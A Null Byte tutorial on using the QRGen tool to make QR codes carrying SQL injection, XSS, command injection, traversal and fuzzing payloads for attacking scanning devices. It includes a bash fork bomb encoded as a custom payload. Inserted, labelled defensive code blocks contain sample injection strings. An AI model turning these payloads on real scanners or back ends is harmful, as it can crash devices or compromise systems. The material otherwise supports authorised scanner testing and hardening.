
Create Malicious QR Codes to Hack Phones and Other Scanners « Null Byte :: WonderHowTo



QR codes are everywhere, from product packaging to airline boarding passes, which makes the scanners that read them an attractive target for hackers. Flaws in many of these proprietary scanning devices mean that common vulnerabilities can be exploited with payloads packaged into custom QR codes.

A tool called QRGen can create malicious QR codes and even encode custom payloads. These attacks are powerful because people cannot read or understand the information contained in a QR code without scanning it. Any device that tries to decode the code is therefore exposed to the payload it contains. Even smartphones used as QR code scanners can be vulnerable to such attacks, as QR codes have been found to be able to lure iPhone users to malicious websites.

What are QR Codes?

QR codes are a machine-readable data format, useful for anything that needs to be scanned automatically. Before QR codes, there were several other formats, called linear barcodes, which also stored data in a way that was easy for machines to read. You've probably seen a UPC barcode on products, as it is often used to identify items for sale so that cashiers can scan them for a faster checkout.

2D barcodes for more data

The answer to the limitations of linear barcodes was 2D barcodes, which provide greater resilience against physical damage to the information they contain. Some of the first 2D codes are still widely used today.

Aztec code is a machine-readable 2D or matrix code that is similar in many ways to a QR code and may contain more information than a linear bar code. Originally developed for logistics, it may be used on packages and envelopes when more data needs to be stored than a linear barcode can deliver.

Other types of 2D barcodes can contain an extremely dense amount of data. For example, the PDF417 format on the back of most US driving licenses can encode up to 1800 ASCII characters.

PDF417 codes as above can encode text, numbers, files, and actual bytes of data, and they are more error resistant than linear barcodes. Companies like FedEx use a combination of PDF417 and other barcodes on delivery notes to automate delivery and tracking.

What can codes do with more data?

QR codes were introduced in the automotive industry to keep track of automobiles as they were manufactured, but quickly grew in popularity outside of this industry. Similar to other 2D codes, QR codes can pack a lot of data and even work if they are reduced in resolution or otherwise corrupted.

A single QR code can contain 4,296 ASCII characters, making it possible to be much more creative about what you can do with them. You can even format the data to trigger actions when a reader recognizes it.

A fascinating use of QR codes, made possible by their greater data capacity, is managing Wi-Fi connections without having to share the password in plain text. By encoding the following string, you can create a QR code that automatically logs Android users into a Wi-Fi network.

  WIFI:S:;T:;P:;H:;

Anyone scanning the QR code on an Android device will automatically be logged in to the encrypted Wi-Fi network. View this code to see how much data a QR code can pack:

This tiny code contains the following text:

Version 40 QR code can contain up to 1852 characters.
A QR code (abbreviated as a quick response code) is a type of matrix bar code (or two-dimensional code) designed to be read by smartphones.
The code consists of black modules arranged in a square pattern on a white background. The coded information may be text, a URL or other data.
The QR code was created in 1994 by the Toyota subsidiary Denso Wave and is one of the most popular types of two-dimensional barcodes.
The QR code has been designed so that its content can be decoded at high speed.
The technology was widely used in Japan and South Korea. The UK is the seventh largest consumer of QR codes.
Although QR codes were originally used to track parts in vehicle construction, they are now used in a much broader context.
This includes both commercial tracking applications and comfort-oriented applications for mobile phone users (so-called mobile tagging).
QR codes can be used to display text to the user, add a vCard contact to the user's device, open a Uniform Resource Identifier (URI), or write an e-mail or text message.
Users can create and print their own QR codes so others can scan and use them by visiting one of several paid and free QR code generating websites or apps.

The text in the image is larger than the QR code itself! This capacity makes QR codes both powerful and dangerous, because people cannot understand the data they contain without scanning them first.
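A scanner app can parse the Wi-Fi string described above and show its fields to the user before any network is joined. The following is an added example, not code from the original article or from QRGen; the function names and the sample strings in the test are constructed, and the field meanings (S = SSID, T = security type, P = password, H = hidden network) follow the commonly used `WIFI:` QR convention.

```python
def parse_wifi_qr(text):
    """Parse a decoded 'WIFI:' QR string into a dict of fields without acting on it."""
    if not text.startswith("WIFI:"):
        raise ValueError("not a Wi-Fi QR payload")
    fields, key, buf, escaped = {}, None, [], False
    for ch in text[len("WIFI:"):]:
        if escaped:
            # The character after a backslash is literal (e.g. "\;" inside an SSID).
            buf.append(ch)
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == ":" and key is None:
            # First unescaped colon ends the field name.
            key, buf = "".join(buf), []
        elif ch == ";":
            # Unescaped semicolon ends the field value.
            if key is not None:
                fields[key] = "".join(buf)
            key, buf = None, []
        else:
            buf.append(ch)
    return fields


def review_wifi_qr(text):
    """Return (fields, warnings) so the user can confirm before the device joins."""
    f = parse_wifi_qr(text)
    warnings = []
    if not f.get("S"):
        warnings.append("missing SSID")
    if f.get("T", "").lower() in ("", "nopass"):
        warnings.append("open network: traffic is not encrypted")
    if f.get("T", "").upper() == "WEP":
        warnings.append("WEP is obsolete and easily broken")
    if f.get("H", "").lower() == "true":
        warnings.append("hidden SSID: device will probe for this name")
    if any(ord(c) < 32 for v in f.values() for c in v):
        warnings.append("control characters in a field")
    return f, warnings
```
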

QRGen for QR Code Hacking

Because a human cannot detect a malicious QR code before actually scanning it, the relatively large payload of a QR code can work to a hacker's advantage, especially in combination with vulnerable devices. The tool we use today to create these codes is called QRGen. It takes a payload and encodes it into a QR code using Python.

QRGen has a built-in library that contains many popular exploits. This is very useful if you have time to sit down with the same device you're looking to exploit and find out what works. A pentester who wants to audit anything that uses a QR code scanner can buy the same scanner and run through the exploits to see which ones cause the scanner to behave in unexpected ways.

The categories of payloads available in QRGen can be accessed by using the -l flag and a number while running the script. The numbers and payload types are listed below.

0: SQL Injections
1: XSS
2: Command Injection
3: Format String
4: XXE
5: String Fuzzing
6: SSI injection
7: LFI / Directory Traversal

To create a batch of malicious QR codes containing fuzzing payloads, you only need to run qrgen.py -l 5, which creates many codes for testing.

What you need

To use QRGen, Python3 must be installed. Since Python is cross-platform, this should be possible on any operating system. You also need some Python libraries, including qrcode, Pillow and argparse, which we install during the setup.

Step 1: Install QRGen

To start with QRGen, we need to download the GitHub repository. To do this, run the following command in a terminal window.

  ~$ git clone https://github.com/h0nus/QRGen

Cloning into 'QRGen'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (86/86), done.
remote: Compressing objects: 100% (78/78), done.
remote: Total 86 (delta 26), reused 4 (delta 1), pack-reused 0
Unpacking objects: 100% (86/86), done.

When the repo finishes downloading, change (cd) into its directory and list (ls) the contents to find the requirements file.

  ~$ cd QRGen
  ~/QRGen$ ls

demo.gif qrgen.py README.md requirements.txt words 

Now you need to make sure that all required libraries are installed. To do this, run the installation file with the following command:

  ~/QRGen$ pip3 install -r requirements.txt

Collecting qrcode (from -r requirements.txt (line 1))
Downloading https://files.pythonhosted.org/packages/42/87/4a3a77e59ab7493d64da1f69bf1c2e899a4cf81e51b2baa855e8cc8115be/qrcode-6.1-py2.py3-none-any.whl
Requirement already satisfied: Pillow in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (5.4.1)
Collecting argparse (from -r requirements.txt (line 3))
Downloading https://files.pythonhosted.org/packages/f2/94/3af39d34be01a24a6e65433d19e107099374224905f1e0cc6bbe1fd22a2f/argparse-1.4.0-py2.py3-none-any.whl
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from qrcode->-r requirements.txt (line 1)) (1.12.0)
Installing collected packages: qrcode, argparse
Successfully installed argparse-1.4.0 qrcode-6.1

If that does not work, you can also install it with this alternative command.

  ~/QRGen$ python3 -m pip install -r requirements.txt

Step 2: Generate malicious QR codes from a payload type

Now you should be able to run the script by typing python3 qrgen.py.

  ~/QRGen$ python3 qrgen.py

e88 88e 888 88e e88 # Y88
d888 888b 888 888D d888 & #; Y, ee, 888 8e
C8888 8888D 888 88 "C8888 eeee d88 88b 888 88b
Y888 888P 888b, Y888 888P 888, 888 888
88 88 888 88b, 88 88 YeeP 888 888
b
8b, QRGen ~ v0.1 ~ by h0nus

Usage: qrgen.py -l [number]
Usage: qrgen.py -w [/path/to/custom/wordlist]

Payload lists:
0: SQL injections
1: XSS
2: Command Injection
3: format string
4: XXE
5: String fuzzing
6: SSI injection
7: LFI / Directory Traversal

Tool for generating bad QRCodes for fuzzing QRCode parsers / readers

optional arguments:
-h, --help show this help message and exit

Options for QRGen:
--list {0,1,2,3,4,5,6,7}, -l {0,1,2,3,4,5,6,7}
Set the word list to use
--wordlist WORDLIST, -w WORDLIST
Use a custom word list

Watch it everywhere, even in the dumbest spot.

As you can see, it's pretty easy to create payloads. First, we'll create a set of codes containing format string payloads. Run QRGen with the following argument:

  ~/QRGen$ python3 qrgen.py -l 5

e88 88e 888 88e e88 # Y88
d888 888b 888 888D d888 & #; Y, ee, 888 8e
C8888 8888D 888 88 "C8888 eeee d88 88b 888 88b
Y888 888P 888b, Y888 888P 888, 888 888
88 88 888 88b, 88 88 YeeP 888 888
b
8b, QRGen ~ v0.1 ~ by h0nus

Payload path generated ..
Path already deleted or deleted.
46 payloads generated!
Last generated payload is opened ...
Thank you for using QRGen from H0nus. 

A series of QR codes is generated, and the last one created opens automatically.

To see the rest of the generated payloads, you can enter cd genqr to go to the directory where they were created, and ls its contents.

  ~/QRGen$ cd genqr
  ~/QRGen/genqr$ ls

payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png
payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png
payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png
payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png
payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png
payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png
payload-15.png payload-24.png payload-33.png payload-42.png
payload-16.png payload-25.png payload-34.png payload-43.png
payload-17.png payload-26.png payload-35.png payload-44.png
payload-18.png payload-27.png payload-36.png payload-45.png 

Step 3: Encode Custom Payloads

To encode a custom payload, we first create a text file that contains what we want to encode. Each line will be a new payload. We can create the text file by entering nano badstuff.txt.

  ~/QRGen/genqr$ nano badstuff.txt

In this text file, we can add our payload. The one below is a fork bomb. Does it work with a QR code scanner? Who knows.

  :(){ :|:& };:

We can save it by pressing Control-X, then Y and Enter to confirm the save. Now you should see a text file with your payload.

  ~/QRGen/genqr$ ls

badstuff.txt payload-18.png payload-27.png payload-36.png payload-45.png
payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png
payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png
payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png
payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png
payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png
payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png
payload-15.png payload-24.png payload-33.png payload-42.png
payload-16.png payload-25.png payload-34.png payload-43.png
payload-17.png payload-26.png payload-35.png payload-44.png 

To write your payload into a QR code, we use the flag -w . Assuming that your payload file is named "badstuff.txt", the command should look like this (remember to return to the QRGen directory first).

  ~/QRGen/genqr$ cd ..
  ~/QRGen$ python3 qrgen.py -w '/username/QRGen/genqr/badstuff.txt'

e88 88e 888 88e e88 # Y88
d888 888b 888 888D d888 & #; Y, ee, 888 8e
C8888 8888D 888 88 "C8888 eeee d88 88b 888 88b
Y888 888P 888b, Y888 888P 888, 888 888
88 88 888 88b, 88 88 YeeP 888 888
b
8b, QRGen ~ v0.1 ~ by h0nus

Payload path available, continued ...
Path already deleted or deleted.
1 payload generated!
Last generated payload is opened ...
Thank you for using QRGen from H0nus. 

The QR code below is generated for my fork bomb payload.

Not All QR Codes Are Advisable to Scan

QR codes can encode a variety of information. As we learned today, they can even be formatted so that a device performs actions such as connecting to a Wi-Fi network. Scanning a QR code is therefore risky because a person cannot read the information before the device is exposed to the payload it contains. If you scan a QR code that looks suspicious, check what the code is trying to launch, and do not connect to a Wi-Fi network or navigate to a shortened link.

While most QR codes should be safe to scan on a smartphone, scanning the payloads generated today on a device used to scan tickets or boarding passes may lead to bizarre behavior from the device. Do not scan payloads on a scanner that you need immediately afterward for an event or job, or on a scanner that you do not have permission to test.
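On the receiving side, the payload categories listed earlier only cause "bizarre behavior" when a scanner's back end trusts the decoded text. The following added example (not from the original article or QRGen) contrasts a lookup that pastes scanned text into SQL with one that allowlists the expected format and binds it as a parameter; the ticket-ID format, table, function names and sample strings are all hypothetical and constructed for illustration.

```python
import re
import sqlite3

# Assumed ticket-ID format (hypothetical): exactly 8 upper-case letters or digits.
TICKET_RE = re.compile(r"[A-Z0-9]{8}")

# Constructed stand-ins for the kinds of strings a fuzzing QR code may carry.
CONSTRUCTED_SAMPLES = [
    "x' OR '1'='1",
    "<script>alert(1)</script>",
    "%s%s%s%n",
    "../../etc/passwd",
    "AB12CD34; ls",
]


def make_db():
    """In-memory ticket table with two constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tickets (id TEXT PRIMARY KEY, holder TEXT)")
    db.executemany(
        "INSERT INTO tickets VALUES (?, ?)",
        [("AB12CD34", "sample holder A"), ("ZZ99YY88", "sample holder B")],
    )
    return db


def lookup_unsafe(db, scanned):
    # Weak: decoded QR text becomes part of the SQL statement itself.
    query = f"SELECT holder FROM tickets WHERE id = '{scanned}'"
    return db.execute(query).fetchall()


def lookup_hardened(db, scanned):
    # 1) Allowlist: anything that is not exactly a ticket ID is rejected,
    #    which covers every payload category, not just SQL.
    if not TICKET_RE.fullmatch(scanned):
        return None
    # 2) Bound parameter: the value is data and is never parsed as SQL.
    return db.execute(
        "SELECT holder FROM tickets WHERE id = ?", (scanned,)
    ).fetchall()
```

With the first constructed sample, `lookup_unsafe` returns every row in the table, while `lookup_hardened` returns `None` for all five samples and a single row for a real ticket ID.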

I hope you liked this guide to generating harmful QR codes to exploit scanning devices! If you have questions about this tutorial on QR codes or have a comment, please use the comments section below. You can also contact me on Twitter @KodyKinzie.


Cover photo and screenshots by Kody / Null Byte



